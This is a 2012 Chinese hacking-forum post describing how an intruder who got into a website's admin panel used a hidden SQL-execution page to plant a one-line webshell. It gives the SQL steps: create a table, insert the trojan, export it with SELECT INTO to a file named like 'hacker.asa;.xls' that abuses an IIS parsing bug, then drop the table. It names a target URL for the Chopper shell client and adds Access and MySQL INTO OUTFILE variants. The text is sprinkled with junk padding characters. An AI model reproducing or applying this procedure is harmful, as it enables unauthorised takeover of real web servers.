找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1909|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。2 `: j3 T/ O9 M, b% T* r
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的/ B- k+ E# W$ u/ x8 A  X' w5 `
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
+ Z& \/ z1 V( p然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
4 ~0 N7 X+ l4 o" f7 }1.create table cmd (a varchar(50))1 H6 y7 R* v0 }$ R; D! y8 [
2.insert into cmd (a) values (‘‘)$ M: h7 F" S  W- x' H
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd/ l- B- Y  l0 V% o' b
(把表cmd的内容导出为物理路径的一个EXCEL文件)* I. B' w! G3 s3 g2 j
4.drop table cmd
, X: G# o2 R6 V利用IIS的BUG成功拿到了WEBSHELL。
. A- g; x$ {, x+ \% C5 t- g. _2 }, t- j3 `! Z; v0 u
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话$ U! q  U7 j- o) F
! {; B3 [2 ~0 @
  SQL语句意思解释:: Y; s2 a3 V7 Q+ T  i/ {" D
  第一句! ^8 p4 Q6 S/ t) l5 v7 [! d
  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为501 j, `, b1 q, z4 g$ R
" f. b5 w- w+ b* }9 o" E6 Y
  第二句- A: I3 ~) w' f
  在表cmd的a字段插入一句话木马
( _- w( a( n: t, d7 @" h  第三句# \" }: ~! B' g+ H  |# \7 Z( o
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件2 F4 J: @4 s. W, f: \7 d. r

1 V8 e# b+ M6 P/ W8 g  第四句: i' _" a: R! `7 T# m, v2 B
  删除建立的cmd表
. b( u1 z! `' C3 V
* t: W! x7 U2 L5 s! X( K9 I  以下内容为测试:
2 c: Z7 ]' ?0 [7 G, q# B! v$ E9 C  Access利用后台SQL执行命令功能导出WebShell:! U/ w9 _7 q4 F2 @1 ]" |
  这个更简单:0 q3 {* y) [2 B+ Q
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]4 E  \) h! g$ s" j6 H% g
  或者
7 ]3 q  I' [& L; x: K& _' \; W# r  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]# a( c: a! f/ k7 S6 V+ U( R

6 a7 i, }* j8 y  后台有执行SQL语句功能(vote为已知表段)
: q) P1 L- b- C  希望对大家有所帮助拿shell的又一个思路
3 w. {, ~, K1 c9 \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表